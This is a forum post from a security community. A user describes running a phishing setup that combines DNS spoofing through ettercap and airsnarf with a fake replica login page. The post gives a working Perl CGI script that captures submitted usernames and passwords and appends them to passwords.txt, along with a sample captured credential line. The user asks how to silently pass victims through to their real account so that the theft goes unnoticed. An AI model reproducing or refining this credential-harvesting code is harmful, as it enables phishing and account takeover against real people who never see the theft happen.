|
|||||||
| Programming A place for our community to discuss their own security related coding projects. |
 |
|
|
LinkBack | Thread Tools | Display Modes |
10-29-2009, 05:56 PM
|
||||
|
||||
cgi script
Okay, So Ive setup air snarf in the lab, im using ettercap to Spoof the dns, I have modified a fake replica page where the login action invokes the cgi script below, the login, is saved and all works fine, my question is instead of serving up the said, cgi page with the example message "sorry our server is down for mantainence" how would we go about using the information from stdin, to refer and log the victim into their account whilst still recording the data to passwords.txt, so instead of the stealing the victims login, and printing a suspicious sorry our servers are down message, the victims logins should be stolen but the victim should also be signed into his account, none the wiser of what just happened,
so a quick overview, the user presses login on the fake replica page, the cgi/html script is executed his info is stored to passwords.txt but he is also then logged in, without seeing any of this happen. CURRENT CGI SCRIPT #!perl # chmod +x this file and stick it in your cgi-bin directory # CHANGE THESE VARIABLES $page_title $page_message $page_image $page_title = "BUSY SERVERS"; $page_message = "SORRY IT LOOKS LIKE OUR SERVERS ARE BUSY TRY LATER"; $page_image = "SERVER.jpg"; print "Content-type:text/html\n\n"; read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); @pairs = split(/&/, $buffer); foreach $pair (@pairs) { ($name, $value) = split(/=/, $pair); $value =~ tr/+/ /; $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $FORM{$name} = $value; } $file = "/passwords.txt"; open (MAIL, ">>$file") or dienice("Can't access $file!\n"); print MAIL "\nurl = $ENV{'SERVER_NAME'}"; foreach $key (keys(%FORM)) { print MAIL ", $key = $FORM{$key}"; } close(MAIL); # return HTML message to user print "<html><head><title>$page_title</title></head><body>"; print "<center>"; print "<img src=\"/$page_image\"><br><br>"; print "$page_message<br><br>\n"; print "</body></html>"; Here is an example of what password.txt looks like url = Backtrack Railway Services, form_charset = UTF-8, login_params = , login_cmd = , submit.x = Log In, login_email = Backtrack@hotmail.com, login_password = backtrack1, target_page = 0 this is what the script needs to something like, excuse this pathetic attempt #!perl # chmod +x this file and stick it in your cgi-bin directory print "Content-type:text/html\n\n"; read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); @pairs = split(/&/, $buffer); foreach $pair (@pairs) { ($name, $value) = split(/=/, $pair); $value =~ tr/+/ /; $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $FORM{$name} = $value; } $file = "/passwords.txt"; open (MAIL, ">>$file") or dienice("Can't access $file!\n"); print MAIL "\nurl = $ENV{'SERVER_NAME'}"; foreach $key (keys(%FORM)) { print MAIL ", $key = $FORM{$key}"; } close(MAIL); # return HTML message to user <html> <body> <form method="post" action="not for forum"> <input type="hidden" name="page" value="$page"> username: <input type="text" name="login_email" value="$key" size=10><br> password: <input type="password" name="login_password" value="$FORM" size=10><p> <input type="submit" value="Log In"> </form> </body> </html> Thanks in advanced.
__________________
In spite of the cost of living, it's still popular. Last edited by killadaninja; 10-30-2009 at 07:10 AM. 
|
|
| Bookmarks |
«
Previous Thread
|
Next Thread
»
| Thread Tools | |
| Display Modes | |
Linear Mode
|
|
All times are GMT. The time now is 03:25 PM.
